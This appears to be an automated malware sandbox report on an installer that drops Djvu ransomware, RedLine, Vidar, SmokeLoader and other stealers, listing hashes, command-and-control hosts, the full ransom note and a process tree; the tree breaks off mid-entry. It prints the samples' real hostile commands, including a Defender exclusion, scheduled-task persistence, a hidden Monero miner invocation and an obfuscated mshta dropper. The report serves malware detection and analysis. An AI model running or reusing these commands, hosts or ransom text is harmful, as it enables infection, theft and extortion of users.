Analysis

  • max time kernel
    1805s
  • max time network
    1811s
  • platform
    windows7_x64
  • resource
    win7-de-20210920
  • submitted
    20-09-2021 21:27

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.1MB

  • MD5

    98586f27312dac0074453e56df6f853d

  • SHA1

    5a59f647912e2b26e4e953a6f975931a52b7488e

  • SHA256

    08dcc0cd8aa90a04708aab25c7de5b66d62b4218ef0c5d2654a24b3cef83e534

  • SHA512

    a4e9c41fccf8994e06d020a5fa0b343e89c94a0dda2edb78e3785b9fcccd2f83c793b39d53b54849714016f9cd6cf758b4a2af0310b17490bea6049a21b8c329

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vtoEIhR0SI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0334gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-vtoEIhR0SI

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

NANANI

C2

45.142.215.47:27643

Signatures

  • Detected Djvu ransomware 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 40 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 30 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 24 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of SetWindowsHookEx 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:972
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:956
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon2034b53252.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:764
            • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2034b53252.exe
              Mon2034b53252.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:608
              • C:\Users\Admin\AppData\Local\Temp\is-H4H5D.tmp\Mon2034b53252.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-H4H5D.tmp\Mon2034b53252.tmp" /SL5="$6002C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2034b53252.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1120
                • C:\Users\Admin\AppData\Local\Temp\is-4TQB0.tmp\EtalevzaJet.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-4TQB0.tmp\EtalevzaJet.exe" /S /UID=burnerch2
                  7⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  PID:2420
                  • C:\Program Files\Windows Portable Devices\HCAMUJVXJG\ultramediaburner.exe
                    "C:\Program Files\Windows Portable Devices\HCAMUJVXJG\ultramediaburner.exe" /VERYSILENT
                    8⤵
                    • Executes dropped EXE
                    PID:3396
                    • C:\Users\Admin\AppData\Local\Temp\is-KMJR7.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-KMJR7.tmp\ultramediaburner.tmp" /SL5="$202AE,281924,62464,C:\Program Files\Windows Portable Devices\HCAMUJVXJG\ultramediaburner.exe" /VERYSILENT
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of FindShellTrayWindow
                      PID:3444
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        10⤵
                        • Executes dropped EXE
                        PID:556
                  • C:\Users\Admin\AppData\Local\Temp\86-014e8-9f7-611bd-3d2cd2b8ffa69\SHodivoqewo.exe
                    "C:\Users\Admin\AppData\Local\Temp\86-014e8-9f7-611bd-3d2cd2b8ffa69\SHodivoqewo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2832
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      9⤵
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      PID:3464
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:275457 /prefetch:2
                        10⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2688
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:2307081 /prefetch:2
                        10⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:4000
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:2044950 /prefetch:2
                        10⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2560
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:3748890 /prefetch:2
                        10⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:7920
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:3748903 /prefetch:2
                        10⤵
                        • Suspicious use of SetWindowsHookEx
                        PID:4768
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:4142121 /prefetch:2
                        10⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:6792
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                      9⤵
                        PID:2360
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
                        9⤵
                          PID:1568
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
                          9⤵
                            PID:7952
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
                            9⤵
                              PID:3788
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
                              9⤵
                                PID:4732
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
                                9⤵
                                  PID:5180
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
                                  9⤵
                                    PID:6768
                                • C:\Users\Admin\AppData\Local\Temp\72-a4024-285-c1884-ce079ec4364c9\Bupugomobu.exe
                                  "C:\Users\Admin\AppData\Local\Temp\72-a4024-285-c1884-ce079ec4364c9\Bupugomobu.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  PID:3028
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehfntuyv.uka\GcleanerEU.exe /eufive & exit
                                    9⤵
                                      PID:2360
                                      • C:\Users\Admin\AppData\Local\Temp\ehfntuyv.uka\GcleanerEU.exe
                                        C:\Users\Admin\AppData\Local\Temp\ehfntuyv.uka\GcleanerEU.exe /eufive
                                        10⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2380
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ehfntuyv.uka\GcleanerEU.exe" & exit
                                          11⤵
                                            PID:2336
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "GcleanerEU.exe" /f
                                              12⤵
                                              • Kills process with taskkill
                                              PID:2640
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vo1xzf4a.nip\installer.exe /qn CAMPAIGN="654" & exit
                                        9⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2264
                                        • C:\Users\Admin\AppData\Local\Temp\vo1xzf4a.nip\installer.exe
                                          C:\Users\Admin\AppData\Local\Temp\vo1xzf4a.nip\installer.exe /qn CAMPAIGN="654"
                                          10⤵
                                          • Executes dropped EXE
                                          • Enumerates connected drives
                                          • Modifies system certificate store
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2956
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vo1xzf4a.nip\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vo1xzf4a.nip\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632173072 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                            11⤵
                                              PID:2564
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzr3y3ni.aok\anyname.exe & exit
                                          9⤵
                                            PID:3896
                                            • C:\Users\Admin\AppData\Local\Temp\lzr3y3ni.aok\anyname.exe
                                              C:\Users\Admin\AppData\Local\Temp\lzr3y3ni.aok\anyname.exe
                                              10⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2236
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzikt04b.vg5\gcleaner.exe /mixfive & exit
                                            9⤵
                                              PID:3052
                                              • C:\Users\Admin\AppData\Local\Temp\lzikt04b.vg5\gcleaner.exe
                                                C:\Users\Admin\AppData\Local\Temp\lzikt04b.vg5\gcleaner.exe /mixfive
                                                10⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:3216
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\lzikt04b.vg5\gcleaner.exe" & exit
                                                  11⤵
                                                    PID:1352
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im "gcleaner.exe" /f
                                                      12⤵
                                                      • Kills process with taskkill
                                                      PID:2456
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Mon2052681967f943.exe
                                      4⤵
                                      • Loads dropped DLL
                                      PID:1220
                                      • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2052681967f943.exe
                                        Mon2052681967f943.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Modifies system certificate store
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1676
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          6⤵
                                            PID:1216
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1224
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon207dbc56e7.exe /mixone
                                        4⤵
                                        • Loads dropped DLL
                                        PID:1544
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon207dbc56e7.exe
                                          Mon207dbc56e7.exe /mixone
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1664
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon207dbc56e7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon207dbc56e7.exe" & exit
                                            6⤵
                                              PID:2684
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "Mon207dbc56e7.exe" /f
                                                7⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2808
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon2077d53518d1d87fb.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1940
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2077d53518d1d87fb.exe
                                            Mon2077d53518d1d87fb.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Loads dropped DLL
                                            PID:1656
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon201d69ca257a.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1992
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon201d69ca257a.exe
                                            Mon201d69ca257a.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:1848
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20d995a123a.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1088
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20d995a123a.exe
                                            Mon20d995a123a.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:524
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon200a63c67be5270.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1800
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon200a63c67be5270.exe
                                            Mon200a63c67be5270.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1744
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon20821cb384.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1380
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20821cb384.exe
                                            Mon20821cb384.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:280
                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20821cb384.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20821cb384.exe
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1668
                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1a7js7
                                                7⤵
                                                • Executes dropped EXE
                                                • Modifies Internet Explorer settings
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2912
                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2912 CREDAT:275457 /prefetch:2
                                                  8⤵
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:3676
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon2047be34ad4.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1036
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2047be34ad4.exe
                                            Mon2047be34ad4.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1968
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon2066007704442e45.exe
                                          4⤵
                                          • Loads dropped DLL
                                          PID:1844
                                          • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon2066007704442e45.exe
                                            Mon2066007704442e45.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1604
                                            • C:\Users\Admin\AppData\Roaming\4749249.scr
                                              "C:\Users\Admin\AppData\Roaming\4749249.scr" /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2324
                                            • C:\Users\Admin\AppData\Roaming\3462761.scr
                                              "C:\Users\Admin\AppData\Roaming\3462761.scr" /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2796
                                              • C:\Users\Admin\AppData\Roaming\3462761.scr
                                                "C:\Users\Admin\AppData\Roaming\3462761.scr"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2896
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 752
                                                7⤵
                                                • Program crash
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2512
                                            • C:\Users\Admin\AppData\Roaming\7947510.scr
                                              "C:\Users\Admin\AppData\Roaming\7947510.scr" /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2716
                                            • C:\Users\Admin\AppData\Roaming\3198603.scr
                                              "C:\Users\Admin\AppData\Roaming\3198603.scr" /S
                                              6⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3040
                                            • C:\Users\Admin\AppData\Roaming\7996400.scr
                                              "C:\Users\Admin\AppData\Roaming\7996400.scr" /S
                                              6⤵
                                                PID:1540
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Mon20503e322c02af83f.exe
                                            4⤵
                                            • Loads dropped DLL
                                            PID:1868
                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE6A6FE2\Mon20503e322c02af83f.exe
                                              Mon20503e322c02af83f.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1820
                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:2352
                                                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                  7⤵
                                                    PID:2448
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                      8⤵
                                                        PID:3768
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                          9⤵
                                                          • Creates scheduled task(s)
                                                          PID:3824
                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                        "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4056
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                          9⤵
                                                            PID:2852
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                              10⤵
                                                              • Creates scheduled task(s)
                                                              PID:3332
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:3316
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1540
                                                      • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2480
                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:2540
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                          8⤵
                                                            PID:2868
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "setup.exe" /f
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:2396
                                                        • C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:2592
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VbsCRIPT: CLOSe ( CREateoBJect ( "wsCRIPT.sHEll" ). RUn( "CMd.ExE /C TYPE ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" > BQRDoAPXV.eXe && STArT bQRdOAPXV.exE -pOMw61vdx0wkZa3aN &if """" == """" for %I In (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ) do taskkill /F /IM ""%~nxI"" " , 0 , tRUe) )
                                                            8⤵
                                                              PID:2784
                                                              • C:\Windows\SysWOW64\cmd.exe
